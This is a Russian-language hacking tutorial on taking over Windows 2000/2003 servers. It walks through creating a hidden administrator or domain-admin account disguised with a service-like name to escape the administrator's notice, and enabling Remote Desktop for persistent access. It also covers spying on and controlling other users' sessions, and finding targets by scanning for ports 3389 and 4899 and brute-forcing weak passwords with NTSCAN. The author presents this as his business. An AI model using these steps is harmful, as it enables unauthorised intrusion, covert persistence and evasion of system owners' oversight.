находясь долгое время на аккаунте главного администратора у нас постоянно растёт риск быть обнаруженными. Исходя из этого, необходимо очень оперативно зайти в Панель Управления компьютером и создать свой собственный аккаунт (учётную запись), желательно с менее заметными ником, дабы он не бросался в глаза при мониторинге сервера администратором. Итак, зайдя в Панель управления, если брать, например, Windows 2000 Terminal Server, мы находим папку Администрирование (Administrative Tools).

Открываем её и запускаем значок с подписью Управление компьютером (Computer Management), находим там вкладку Локальные пользователи и Группы (Local Users and Groups) и щёлкаем правой кнопкой мыши по вкладке Пользователи (Users), вследствие чего, появиться меню в которой, на самом верху будет предложение о создании нового пользователя (Create new user), нажимаем её, и у нас появляются поля для ввода логина и пароля для нового аккаунта (учётной записи), мы присваиваем ей имя (ник), в данном случае я рекомендовал бы создавать ник и описание учётной записи с именами сервисов и служб, необходимых для работы системы, чтобы администратор как можно менее обращал внимание на новый аккаунт и, таким образом, он меньше бы бросался в глаза.

Далее, после того как мы создали логин и пароль, нам предстоит назначить права этому пользователю. Для этого мы находим его уже в списке пользователей и правой клавишей выбираем свойства пользователя (properties; чтобы было понятно, тут я говорю об русской и английской версии системы, следовательно названия опций на английском и русском языке) и там выбираем вкладку Членство в группах, где находим кнопку Добавить (Add).

Далее, в появившемся окне нажимаем кнопку Дополнительно и справа нажимаем Поиск, после чего внизу будут отображаться все группы пользователей зарегистрированных на этой машине, одну из которых мы выбираем, выделяя её мышкой, и нажимаем ОК, то есть добавляем себя в группу, к примеру, Администраторы, что наиболее логично в нашем случае.

Далее, смотрим есть ли в списке группа Пользователи удалённого рабочего стола (Remote Desktope Users). Если есть, то добавляем себя и в эту группу, как раз для того, чтобы иметь права на подключение через Удалёный рабочий стол (Remote Desktop или Terminal Service), после добавления в эту группу, мы сможем подключаться через RDC, введя IP сервера, а так же логин и пароль, который мы создавали в закладке Локальные пользователи и группы. Так же следует обратить внимание на то, есть ли в папке Администрирование (Administrative Tools) конфигураторы под названием Active directory и, если есть, то не торопимся создавать свою учётную запись в ранее указанном месте, а открываем закладку, где находим раздел Users and Computers в Active directoryСоздаём пользователя именно там, потому что локальные и доменные пользователи имеют разные права доступа. К примеру, доменный администратор, естественно, имеет больше прав, чем локальный администратор, так как локальному даны права на администрирование только того сервера, на котором он прописан как локальный Администратор, и доступа к доменным сервисам у него, естественно, не будет, а поскольку большинство серверов являются ещё и контроллерами домена, то желательно иметь права доменного админа, то есть входить в группу Администраторов домена, даже потому как, если вы будите пробовать устанавливать удалённое соединение с сервером через RDC (Remote Desktop), то при наличии домена в закладке ввода логина и пароля, имея права пусть и администратора, но локального, система попросту вас не пустит, так как у вас не будет прав авторизации в домене.

Теперь, когда у нас есть пользователь с правами админа, и, желательно, не локального, а доменного, то мы можем действовать довольно свободно при обращении к тем или иным свойствам и параметрам сервера. Так же, с особой осторожностью следует относиться к параметрам конфигураций, которые мы делаем, и не допустить ошибок, так как можно потерять доступ к серверу по собственной вине из-за невнимательности и спешки, дабы побыстрее всё сделать!

Далее, необходимо проверить ещё наиболее важный раздел под названием Политика безопасности (Security Policy)

Здесь желательно проверить все опции, относящиеся к разделу Локальные политики, где нас будут интересовать 2 подраздела, а именно: Назначение прав пользователей и Параметры безопасности. Здесь находятся наиболее важные свойства конфигурации системы, отвечающие за её безопасность, так что здесь надо быть наиболее внимательным и неторопливым в выборе опций, поэтому хочу заранее предупредить: если вами будут внесены некорректные изменения в эти 2 раздела Политики Безопасности, то система неминуемо выйдет из строя и работа сервера будет остановлена, в результате чего у вас уже не будет никаких шансов что-либо вернуть на место!!! Помните, с Политикой Безопасности не шутят!!! Она ошибок не прощает!
Итак, если мы не собираемся делать поспешных действий, то можно приступить к корректировке свойств Политики Безопасности под себя, то есть под свою учётную запись. Значит так, начнём с того, что внимательно осмотрим эти два подраздела раздела Локальная политика. Найдём в списке значений, которые находятся в подразделе Назначение прав пользователя в виде значков вида "файл", с обозначениями ноликов и единичек синего цвета, функции которых в свойствах каждого объекта имеют два значения "включить" или "выключить". Теперь нам нужно определить по названию, какие из них относятся к опциям удалённого доступа и служб терминального соединения, а именно, как вам уже, наверно, известно: Удалённого рабочего стола. Дело в том, что здесь очень важно не пропустить нужный нам объект, для того чтобы проверить свойства доступа к системе, и каковы именно права нашего вновь созданного аккаунта (учётной записи) относительно конфигурации прав доступа к системе по терминальному соединению! Очень важно запомнить одно: Чего не знаешь или не уверен - никогда не трогай и не изменяй, лучше обратитесь к справочной системе, которая имеет довольно-таки неплохое описание параметров настроек конфигураций модулей безопасности и их статусы. Итак, нам необходимо искать имена модулей в списке таких как: Удалённый доступ или Терминальное соединение, и внимательно смотреть в их свойствах наличие нашей учётной записи в списках разрешённой и имеющей полномочия прав доступа на совершение удалённого соединения. Должен сказать, что этому моменту я, как видите, решил уделить несколько больше времени, потому что имею хорошее представление о том, что как раз именно не корректные настройки или, даже, отсутствие таковых, в Политике Безопасности, решает абсолютно всё, касаемо вашего пребывания на сервере, в первую очередь в плане его функциональности, а так же, если брать на вторичном плане: ваших прав на совершение каких-либо действий как пользователь. Самое главное помните: главное не задеть саму систему, так как права пользователя в системе можно восстановить, а вот если вы их нарушите права системы, то последствия в поведении сервера могут быть просто непредсказуемыми! Далее необходимо проверить настройки в модуле Мой Компьютер, где, щёлкнув правой клавишей по иконке Мой компьютер, вы увидите в самом низу открывшегося меню опцию Свойства (Properties), выбрав которую, вы увидите вкладку Удалённые сеансы, где будет находиться опция включения Удалённого помощника, что в нашем случае нам не понадобится, но нас будет интересовать нижняя опция - Дистанционное управление рабочим столом, где надо поставить галочку Разрешить удалённый доступ к этому компьютеру, и нажать применить (Apply) внизу. Затем следует нажать кнопку Выбрать удалённых пользователей, где вы должны убедиться, что ваша учётная запись присутствует в списке пользователей, имеющих право на Дистанционное подключение к рабочему столу, и, если ваш профиль присутствует в этом списке, то остается только нажать применить и Oк, если же нет, то необходимо его туда добавить и сохранить при выходе из параметров.
Итак, мы закончили первичную конфигурацию своей учётной записи. Теперь нам необходимо заняться самим сервером: чтобы проверить, разрешает ли сам сервер входящие подключения по Удалённому рабочему столу, нам нужно будет получить доступ к модулю, который также находится в Панели управления в разделе или папке этого раздела под названием Администрирование (Administrative Tools), где мы увидим модуль под названием Terminal Server configuration client и, запустив его, нам необходимо будет проверить в параметрах вкладки Server, нажав на которую мы увидим значки аналогичные значкам в Политике Безопасности (не забыли их, надеюсь), в которых будут выставлены опции, значение которых будет располагаться напротив каждого из них. Нас интересует модуль, на котором есть надпись Remote Desktop, и вот, как раз напротив него, должно стоять значение "Включён" (Enabled), что будет говорить о том, что удалённый рабочий стол активен в параметрах серверного соединения с сетью. Далее, мы должны получить доступ через Удалённый рабочий стол. То, что я здесь рассказал, это лишь малая часть того, что необходимо знать при работе с сервером, будь то Windows 2000 Terminal Server или же Windows 2003 Server, так как принципиальной разницы нет (присутствуют только самые малые различия в местонахождении некоторых конфигураторов, которые в одной системе - в одном месте, в другой - в ином). Итак, теперь, я надеюсь, вы немного стали понимать, что и как приходиться делать на сервере, если вы, конечно, раньше этого не знали. После данных настроек сервер будет считать вас одним из своих пользователей с правами Администратора, и вы уже сможете заходить на сервер под своей учётной записью. И, наконец, последнее по этому вопросу: также не мешало бы тем, кто хочет работать на сервере быстро и прогрессивно по тем моментам, которые я здесь перечислил, со временем попробовать работать через консоль управления, так как это значительно ускоряет ваши действия и экономит время, делая ваши шансы завладеть уязвимым сервером, находясь на нём, намного выше, так как вы уменьшаете вероятность быть обнаруженным администратором системы или сервера. А суть того, о чём я говорю, заключается в следующем: необходимо выучить название модулей в файловом формате и расширения, для той цели, чтобы не открывать кучу окон и терять время, пока вы ждёте их открытия, тем более, удалённо - через интернет, а вводить имена модулей, вызывая их из командной строки (Пуск -> Выполнить -> Команда). К примеру, вызов Конфигуратора Политики Безопасности, в которую мы с вами попадали через Панель управления, и в ней же ещё и папка Администрирование, которые необходимо постоянно запускать и ждать пока они откроются, я делаю по другому, и хочу показать вам насколько это удобнее, если всего-навсего заучить имена и расширение файлов каждого модуля. К примеру, Модуль Политики Безопасности вызывается путём ввода в строку Выполнить (Run) в меню Пуск (Start) команду "secpol.msc", и мы уже имеем перед собой окно Политики безопасности почти за 1 секунду! Далее, к примеру, нам нужен модуль Управления компьютером, который так же находиться в Администрировании. Лезть за ним очень долго и нудно, поэтому мы, чтобы вызвать этот модуль, в котором как раз, если вы не забыли, находятся разделы конфигурации Локальных пользователей и групп, (мы за несколько секунд сделаем то, что могли бы делать несколько минут, я имею ввиду, конечно же, через сеть Интернет, как вы понимаете, так как связь с другим компьютером всегда замедляет посланную вами команду, и её выполнение, как минимум, на несколько секунд) вызываем модуль путём ввода "compmgmt.msc" и получаем Конфигуратор управления компьютером и редактирования его параметров, а, в данном случае, создание пользователя и присвоение ему административных прав доступа. Далее, вызов Терминального серверного клиента конфигурации проводим командой "tscc.msc"

И, наконец, если мы хотим вызвать Конфигуратора Сервиса Терминала, а именно Terminal Services Manager, мы используем команду "tsadmin.msc", что позволит нам наблюдать за тем, кто сейчас на сервере из пользователей, а также чем они занимается.

Ещё в нём есть опции не только наблюдения, но и управления активными пользователями, при использовании которых можно завершать работу сессии пользователей, закрывать программы, ими используемые. Далее, при наличии пароля доступа к аккаунту пользователя, можно войти в его сессию и, таким образом, просмотреть в живую чем он занимается и какие программы работают, и, по мере необходимости, вводить коррективы в работу программ и прав доступа к ним, контролировать их работу.

3) Ну а теперь, я постараюсь немного рассказать об одном из способов взлома серверов на платформе NT-2000-2003. Для начала, необходимо наличие сканеров, желательно тех, которыми пользоваться, увы, не считается популярным, как, например, NMAP - консольный TCP/IP сканер наиболее популярных уязвимостей на серверах. Так же необходимо, ориентируясь на диапазоны прокси серверов, выстраивать для себя приблизительную картину масштаба определения местонахождения выделенных серверов, затем выбрать приблизительный диапазон сканирования на предмет уязвимых сервисов. К примеру, необходимо обращать внимание на наличие на сервере открытых портов, таких как TCP порты: 3389 - это порт, используемый программой Remote Desktop и её сервисами, а также порт 4899, который используется радмином - прогой Remote Administrator. Все эти сервисы довольно уязвимы, и через них вполне реально поиметь сервак. Все секреты, конечно, я тут раскрывать не стану, так как мне ещё дорог свой бизнес которым я занимаюсь, но один из способов рассказать могу!
Значит так, есть такая программа, которую в сети вам найти будет вполне по силам и называется она NTSCAN.

Делает она следующее: при выборе определённого диапазона она сканирует сервера на предмет простых паролей (simple passwords). Программа имеет довольно неплохой выбор метода атаки, и вероятность взлома сервером с её помощью очень велика, так как админы часто ставят простые пароли к серверу, особенно на забугорных. Прога работает по принципу брута: посылает запрос на авторизацию на сервере и получает ответ от севера. В случае успешной авторизации выводит список серверов в нижней части программы. Теперь главное выбрать диапазон сканирования и настроить программу для эффективной работы. Сверху мы вписываем диапазон IP серверов, как вы наверно уже поняли. Далее, HostFile - список хостов (я не использовал эту опцию), здесь можно создать файл с конкретными хостами и брутить конкретные хосты. Потоки я оставлял как есть: 50, Timeout - аналогично. ConnectShare - подключение к расшаренным ресурсам. Можно выбирать метод атаки: IPCscan, SMBscan, WMIscan. Далее, "ping from host" - пинговать хосты, то есть проверка на живучесть хоста, перед попыткой атаки, чтобы не брутить в холостую мёртвые хосты. Scan host opened port - сканировать хосты с открытым портом 139, но так же можно и изменить при желании. Speed - скорость работы брута (перебора паролей). Дальше уже всё зависит от вашего желания и способностей завладеть серверами. На сим закончу!

С уважением, ваш 0.p.т.i.ђ icq:#788897.


©Zloy.org

Первый блин

тест